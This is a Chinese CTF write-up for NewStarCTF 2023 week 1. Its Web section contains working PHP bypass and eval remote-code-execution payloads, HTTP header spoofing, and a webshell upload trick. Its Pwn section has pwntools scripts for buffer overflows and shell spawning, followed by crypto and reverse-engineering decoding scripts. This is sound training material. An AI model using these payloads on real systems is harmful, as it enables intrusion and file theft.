NewStarCTF 2023 week1 writeup
花了几天时间,终于把week1的题目做完了,还是学到不少东西的,题目质量大多都挺高的,很适合新手入门。
Web
1.泄漏的秘密
url/robots.txt查看robots协议,找到第一部分的flag
PART ONE: flag{r0bots_1s_s0_us3ful
url/www.zip查看网站备份,找到第二部分的flag
$PART_TWO = "_4nd_www.zip_1s_s0_d4ng3rous}";
flag:flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}
信息搜集小结一下:
1.页面源代码
2.敏感文件泄露
①robots.txt
当我们在搜索引擎上打上内容点击搜索的时候,搜索引擎靠一个叫robot的程序去互联网中访问并获取网页信息。
robots.txt文件是存放在网站根目录下的文本文件,是robot访问网站时第一个要检查有无的文件,如果存在的话,那robots.txt文件会告诉robot我这个网站里的哪些页面是可以访问哪些是不能访问的。
做题时就可以先尝试一下/robots.txt看看有没有这个文件如果有的话,里面的那些disallow的文件就是我们重点访问的文件[手动狗头]。
②.phps文件
PHP是服务端语言,在前端页面用户是无法看到的,如果需要让用户查看php源码呢?就是这个xx.phps文件里面是xx页面的php源码。当然.phps文件不是哪个网站都有,做题的时候怎么说呢基本碰不到吧,一些入门题,题目描述到.phps文件,打开题目链接就直接/index.phps就可以了如果不是index.phps也可以用御剑扫一下。。
③www.zip文件
网站的所有文件都在www文件中,可能是怕网站文件丢失,所以将www文件压缩成www.zip备份,这时候访问/www.zip(也可能不在根目录下)可能会有惊喜。www.zip/rar/tar.gz往往是网站的源码备份。
④vim缓存文件泄露
在使用vim编辑过程中如果异常退出编辑,比如不小心碰到了电源键。但是你编辑的东西不会丢失而是系统帮你生成一个.swp的缓存文件(格式为.文件名.swp)第二次意外退出时为.swo,第三次为.swn,所以根据题目描述就可以访问.xx.swp的文件(注意最前面多个.)。
恢复文件内容的方法,执行“vim 文件名”命令的目录下创建一个名字相同的文件夹“touch 文件名”“cat 文件名(此时为空)”再使用“vim -r 文件名”命令。然后"cat 文件名"就能看见被缓存的内容了
⑤mdb文件泄露
mdb文件是早期asp+access构架的数据库文件,文件泄露相当于数据库被脱裤了
文件路径:URL/db/db.mdb
2.Begin of Upload
考文件上传,我直接传马会弹窗提示“错误的拓展名,只允许上传: JPG, JPEG, PNG, GIF”
开bp,传后缀为jpg的马,拦截到后改后缀为php,蚁剑链接,在根目录找到flag。
3.Begin of HTTP
进题目提示:请使用 GET方式 来给 ctf 参数传入任意值来通过这关
解题:URL/ctf=1
很棒,如果我还想让你以POST方式来给我传递 secret 参数你又该如何处理呢?
如果你传入的参数值并不是我想要的secret,我也不会放你过关的
或许你可以找一找我把secret藏在了哪里
解题:查看源代码,看到了Secret: base64_decode(bjN3c3Q0ckNURjIwMjNnMDAwMDBk) ,base64解一下n3wst4rCTF2023g00000d
POST /?ctf=1 HTTP/1.1
Host: node5.buuoj.cn:27352
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://node5.buuoj.cn:27352/?ctf=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: http://node5.buuoj.cn:27352
Connection: close
Cookie: power=hacker
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
secret=n3wst4rCTF2023g00000d
修改CooKie为ctfer过check
修改User-Agent为NewStarCTF2023
修改Referer为newstarctf.com
添加X-real-ip为127.0.0.1
POST /?ctf=1 HTTP/1.1
Host: node5.buuoj.cn:27352
User-Agent: NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: newstarctf.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: http://node5.buuoj.cn:27352
Connection: close
Cookie: power=ctfer
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
X-real-ip: 127.0.0.1
secret=n3wst4rCTF2023g00000d
恭喜你顺利完成了本道题目,这是你的Flag,快去提交吧:flag{6b5cdac3-cb3e-431b-94f5-0368569d8bc2}
4.ErrorFlask
说实话,没懂这道题考什么,给number1传入一个数,flag就在报错信息中,后续再学习吧。
5.Begin of PHP
<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['key1']) && isset($_GET['key2'])){
echo "=Level 1=<br>";
if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
$flag1 = True;
}else{
die("nope,this is level 1");
}
}
if($flag1){
echo "=Level 2=<br>";
if(isset($_POST['key3'])){
if(md5($_POST['key3']) === sha1($_POST['key3'])){
$flag2 = True;
}
}else{
die("nope,this is level 2");
}
}
if($flag2){
echo "=Level 3=<br>";
if(isset($_GET['key4'])){
if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
$flag3 = True;
}else{
die("nope,this is level 3");
}
}
}
if($flag3){
echo "=Level 4=<br>";
if(isset($_GET['key5'])){
if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
$flag4 = True;
}else{
die("nope,this is level 4");
}
}
}
if($flag4){
echo "=Level 5=<br>";
extract($_POST);
foreach($_POST as $var){
if(preg_match("/[a-zA-Z0-9]/",$var)){
die("nope,this is level 5");
}
}
if($flag5){
echo file_get_contents("/flag");
}else{
die("nope,this is level 5");
}
}
level1,需要传入的key1!=key2,但是要求md5(key1)==md5(key2)
在php中
强比较:使用三个 ''==='' 比较,比较值,也比较类型
弱比较:使用两个 ''=='' 比较,只比较值,不比较类型
a==b 转同类型->后比较值
a===b 先判断类型是否相同,如果相同则比较值;如果不同则返回 false
0e绕过
科学记数法是一种记数的方法。
计算器表达10的幂一般是用E或e
如:2760000=2.76×10^6=2.76e6
所以0e,无论后面跟什么值,都是0
所以只需要找出两个md5后开头是0e后面都是数字的参数,就可以实现绕过。
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
所以level的payload->url/?key1=s878926199a&key2=s155964671a
level2,需要用post方法传入key3,要求md5(key3)===sha1(key3)
PHP哈希函数的特性,在处理数组类型的传参时,md5、sha1等哈希函数会返
回NULL值,由此可以构造出NULL===NULL从而通过判断
payload->key3[]=1
level3,需要用get方法传入key4,用strcmp和flag进行比较(我要是知道flag还做什么题?)
第三关主要考察strcmp函数特性,如果传入的参数为数组类型,该函数就会返回NULL值,构造
NULL==0从而通过判断
payload->url/?key1=s878926199a&key2=s155964671a&key4[]=1
level4,需要用get方法传入key5,key5必须不是数字,但是又大于2023
key5=2024a
level5
使用 extract() 函数处理 $_POST 数组。这个函数会将数组中的键作为变量名,对应的值作为变量值,创建新的变量。这通常被认为是不安全的做法,因为它可能导致未预期的变量覆盖。利用这个来添加flag5这个变量。
payload->key3[]=1&flag5=.
flag{6365e746-3990-4139-980d-6838a025d2a8}
6.R!C!E!
<?php
highlight_file(__FILE__);
if(isset($_POST['password'])&&isset($_POST['e_v.a.l'])){
$password=md5($_POST['password']);
$code=$_POST['e_v.a.l'];
if(substr($password,0,6)==="c4d038"){
if(!preg_match("/flag|system|pass|cat|ls/i",$code)){
eval($code);
}
}
}
爆破一个md5加密之后开头是c4d038的数值
php是如何处理带有非法字符参数名的。 $e_v.a.l变量名传参时.+这种非法字符会被转化为_但是如果是'['非法字符,会被转化为'_'后会使得后续的非法字符得到保留
payload:
password=114514&e[v.a.l=eval($_POST['cmd']);&cmd=system('cat /flag');
7.EasyLogin
这题,让我学习了bp爆破的时候如何加规则(如md5),也让我意识到,做题没思路了就把题放到bp中,看每一个包的发送和相应,其它的也没啥,感觉这题没啥意思。
Pwn
week1的pwn题都比较简单,很适合新手入门,不多介绍了。
1.ret2text
from pwn import *
p = process('./ret2text')
context(os='linux',arch='amd64',log_level='debug')
payload = b'a'*0x20+b'bbbbbbbb'+p64(0x04011FB)
p.sendafter('magic\n',payload)
p.interactive()
2.ezshellcode
from pwn import *
p = process('./pwn')
context(os='linux',arch='amd64',log_level='debug')
payload = shellcraft.sh()
p.sendafter('magic\n',asm(payload))
p.interactive()
3.newstar shop
将money花到负数,然后就拿到shell了。
4.p1eee
from pwn import *
p = process('./pwn')
context(os='linux',arch='amd64',log_level='debug')
payload = b'a'*0x20+b'bbbbbbbb'+b'\x6c'
p.sendafter('pie!!!\n',payload)
p.interactive()
5.Random
from pwn import *
from ctypes import *
context(arch='amd64',log_level='debug')
elf = ELF('./pwn')
libc = cdll.LoadLibrary('libc.so.6')
glibc = ELF('./libc.so.6')
for i in range(0x100):
try:
p = process('./pwn')
seed = libc.time(0)
password = libc.rand(libc.srand(seed))
p.sendlineafter('number?\n',str(password))
p.sendline('ls')
p.recvuntil('pwn')
break
except:
p.close()
p.interactive()
Misc
1.CyberChef's Secret
来签到吧!下面这个就是flag,不过它看起来好像怪怪的:-)
M5YHEUTEKFBW6YJWKZGU44CXIEYUWMLSNJLTOZCXIJTWCZD2IZRVG4TJPBSGGWBWHFMXQTDFJNXDQTA=
CyberChef真好用!
2.机密图片
附件是一张二维码,扫描之后没有啥关键信息。
用binwalk分离一下python binwalk -e C:\Users\Administrator\Desktop\NewStarCTF2023\week1\misc\机密图片\secret.png
啥也没分离出来,用stegsolve看道了flag。
flag{W3lc0m3_t0_N3wSt4RCTF_2023_7cda3ece}
3.流量!鲨鱼!
不怎么会做这种题。。。
先用 http && http.response.code == 200来过滤一些干扰流量。
找到flag,应该是base64编码过的,用CyberChef解码一下
4.压缩包们
题目描述:常见的压缩包又能玩出什么花样呢?
下载附件后修改后缀为zip,爆破一下密码就得到flag了。
5.空白格
https://vii5ard.github.io/whitespace/
用空格、换行符、tab能转成汇编代码,大概就是伪机器指令。见识见识就算了,感觉没必要深入研究。
6.隐秘的眼睛
用特定的软件进行解密SilentEye,这个软件能将文字藏在图片中。
说实话,这种题目,我总感觉。。。咳咳,质量不高。
Crypto
1.brainfuck
题目:
++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>++++++.>----.<-----.>-----.>-----.<<<-.>>++..<.>.++++++.....------.<.>.<<<<<+++.>>>>+.<<<+++++++.>>>+.<<<-------.>>>-.<<<+.+++++++.--..>>>>---.-.<<<<-.+++.>>>>.<<<<-------.+.>>>>>++.
Brainfuck加密
flag{Oiiaioooooiai#b7c0b1866fe58e12}
2.Caesar's Secert
题目:
kqfl{hf3x4w'x_h1umjw_n5_a4wd_3fed}
凯撒密码,用网站直接枚举
flag{ca3s4r's_c1pher_i5_v4ry_3azy}
3.Fence
题目:
fa{ereigtepanet6680}lgrodrn_h_litx#8fc3
栅栏密码
flag{reordering_the_plaintext#686f8c03}
4.Vigenère
pqcq{qc_m1kt4_njn_5slp0b_lkyacx_gcdy1ud4_g3nv5x0}
知道是维吉尼亚加密后,根据前四个字母是flag来推测密钥,密钥猜测是3位或者4位的,要么是kfc,要么是kfck,最后尝试得到是密钥是kfc,直接解密就可以获得。
flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}
5.babyencoding
part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ=
part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY=
part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T`
part1用base64解码:flag{dazzling_encoding#4e0ad4
part2用base32解密:f0ca08d1e1d0f10c0c7afe422fea7
part3用uuencode解码:c55192c992036ef623372601ff3a}
flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}
6.babyrsa
from Crypto.Util.number import *
from flag import flag
def gen_prime(n):
res = 1
for i in range(15):
res *= getPrime(n)
return res
if __name__ == '__main__':
n = gen_prime(32)
e = 65537
m = bytes_to_long(flag)
c = pow(m,e,n)
print(n)
print(c)
# 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
# 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
解密脚本:
from Crypto.Util.number import *
import gmpy2
n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
e = 65537
npq = [2217990919,2338725373,2370292207,2463878387,2706073949,2794985117,2804303069,2923072267,2970591037,3207148519,3654864131,3831680819,3939901243,4093178561,4278428893]
phi = 1
for i in npq:
phi = phi*(i-1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
7.Small d
from secret import flag
from Crypto.Util.number import *
p = getPrime(1024)
q = getPrime(1024)
d = getPrime(32)
e = inverse(d, (p-1)*(q-1))
n = p*q
m = bytes_to_long(flag)
c = pow(m,e,n)
print(c)
print(e)
print(n)
# c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
# e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
# n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
import RSAwienerHacker
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
d = RSAwienerHacker.hack_RSA(e,n)
if d:
print(d)
#d=2357048593
from Crypto.Util.number import *
c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
d = 2357048593
flag = pow(c,d,n)
print(long_to_bytes(flag))
#flag{learn_some_continued_fraction_technique#dc16885c}
8.babyxor
简单的异或
from secret import *
ciphertext = []
for f in flag:
ciphertext.append(f ^ key)
print(bytes(ciphertext).hex())
# e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2
其实知道key就可以知道flag,但是并不知道,那么就爆破一下。
ciphertext_hex = "e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2"
# 将十六进制密文转换为字节序列
ciphertext = bytes.fromhex(ciphertext_hex)
# 尝试所有可能的key值(0-255)来解密
for key in range(256):
decrypted_text = []
for char in ciphertext:
decrypted_char = char ^ (key)
decrypted_text.append(decrypted_char)
# 将解密后的字节序列转换为字符串并打印
decrypted_str = ''.join(chr(c) for c in decrypted_text)
if 'flag' in decrypted_str:
print(f"Key: {key}, Decrypted text: {decrypted_str}")
9.Affine
from flag import flag, key
modulus = 256
ciphertext = []
for f in flag:
ciphertext.append((key[0]*f + key[1]) % modulus)
print(bytes(ciphertext).hex())
# dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064
盲猜dd是f加密后的,43是l加密后的,两个未知数两个方程,用z3模块先解出key
from z3 import *
def solve_example_with_z3():
# 声明整数变量
x, y = Ints('x y')
# 设置约束
solver = Solver()
solver.add(0xdd == (x*ord('f')+y)%256) # y 等于 2 倍的 x
solver.add(0x43 == (x*ord('l')+y)%256) # z 等于 x 和 y 的和
# 求解约束
if solver.check() == sat:
# 找到满足条件的解
print(solver.model())
else:
print("No solution!")
# 调用函数来求解问题
solve_example_with_z3()
#[x = 17, y = -1513]
解密脚本:
def extended_gcd(a, b):
"""
计算a和b的最大公约数,并返回(gcd, x, y),使得 a*x + b*y = gcd
"""
if a == 0:
return b, 0, 1
else:
gcd, y, x = extended_gcd(b % a, a)
return gcd, x - (b // a) * y, y
def modinv(a, m):
"""
计算a在模m下的乘法逆元
"""
gcd, x, y = extended_gcd(a, m)
if gcd != 1:
raise Exception('Modular inverse does not exist')
else:
return x % m
# 已知的密钥和模数
key = [17, -1513]
modulus = 256
# 假设的密文(应该是一个十六进制字符串表示的字节数组)
ciphertext_hex = "dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064"
# 将十六进制字符串转换为字节数组
ciphertext = bytes.fromhex(ciphertext_hex)
# 计算key[0]在模modulus下的乘法逆元
inv_key = modinv(key[0], modulus)
# 解密过程
plaintext = []
for c in ciphertext:
# 使用乘法逆元和key[1]来解密
p = (inv_key * (c - key[1])) % modulus
# 将解密后的值转换为ASCII字符(如果它在ASCII范围内)
if 0 <= p <= 127:
plaintext.append(chr(p))
else:
plaintext.append('?') # 如果不在ASCII范围内,用?代替
# 将解密后的字符列表转换为字符串并打印
flag = ''.join(plaintext)
print(flag)
#flag{4ff1ne_c1pher_i5_very_3azy}
这道题考的应该是线性同余变换,等着学习一下。
10.babyaes(不会做)
from Crypto.Cipher import AES
import os
from flag import flag
from Crypto.Util.number import *
def pad(data):
return data + b"".join([b'\x00' for _ in range(0, 16 - len(data))])
def main():
flag_ = pad(flag)
key = os.urandom(16) * 2
iv = os.urandom(16)
print(bytes_to_long(key) ^ bytes_to_long(iv) ^ 1)
aes = AES.new(key, AES.MODE_CBC, iv)
enc_flag = aes.encrypt(flag_)
print(enc_flag)
if __name__ == "__main__":
main()
# 3657491768215750635844958060963805125333761387746954618540958489914964573229
# b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
没了解过aes加密,等学了之后再做这道题吧。
Reverse
1.easy_RE
首先将flag的前半段压入栈flag{we1c0m
查找字符串又看道flag后半段e_to_rev3rse!!}
flag{we1c0me_to_rev3rse!!}
2.咳
加了upx壳,脱壳之后用ida打开
看一下Str2,扫一眼盲猜就是每一个字符的ascii码+1,直接写解密脚本:
encode = 'gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~'
for i in range(len(encode)):
print(chr(ord(encode[i])-1),end='')
3.Segments
IDA的Segments窗口要怎么打开呢(注:flag格式为flag{...})
题目都提示了,是shift+F7,真贴心啊。
flag{You_ar3_g0od_at_f1nding_ELF_segments_name}
4.ELF
先base64解码后简单亦或加密
import base64
correct = 'VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t'
s = base64.b64decode(correct)
flag = ''
for i in s:
i = chr((i - 16) ^ 32)
flag += i
print(flag)
5.Endian
提取出flag来,然后简单脚本解码,然后转字符
from Crypto.Util.number import *
data = [0x75553A1E,0x7B583A03,0x4D58220C,0x7B50383D,0x736B3819]
flag = b''
for t in data:
flag += long_to_bytes(t^0x12345678)[::-1]
print(flag)
6.AndroXor
附件是一个apk,看题目应该是个亦或的加密。
用jadx打开apk文件,找到main函数(或许并不准确),其实就是一个简单的亦或,提取出数据来编写脚本解密就行。
str1 = [14,'\r', 17,23, 2, 'K', 'I', '7',' ', 30, 20,'I','\n',2,'\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r']
str1 = [14, 13, 17, 23, 2, 75, 73, 55, 32, 30, 20, 73, 10, 2, 12, 62, 40, 64, 11, 39, 75, 89, 25, 65, 13]
str2 = "happyx3"
for i in range(len(str1)):
temp = chr(str1[i] ^ ord(str2[i % len(str2)]))
print(temp,end='')
7.EzPE
题目描述:这个EXE怎么运行不了呢?
找一个可以执行的exe文件,复制文件头到附近的exe,文件就能打开了。
ida打开,是简单的亦或加密,写解密脚本解密即可。
encode = [0x0A,0x0C,0x04,0x1F,0x26,0x6C,0x43,0x2D,0x3C,0x0C,0x54,0x4C,0x24,0x25,0x11,0x06,0x05,0x3A,0x7C,0x51,0x38,0x1A,0x03,0x0D,0x01,0x36,0x1F,0x12,0x26,0x04,0x68,0x5D,0x3F,0x2D,0x37,0x2A,0x7D]
for i in range(len(encode)-2,-1,-1):
encode[i] ^= (i)^encode[i+1]
for i in range(len(encode)):
print(chr(encode[i]),end='')
8.lazy_activtiy
APK文件,jadx打开后直接搜索字符串。
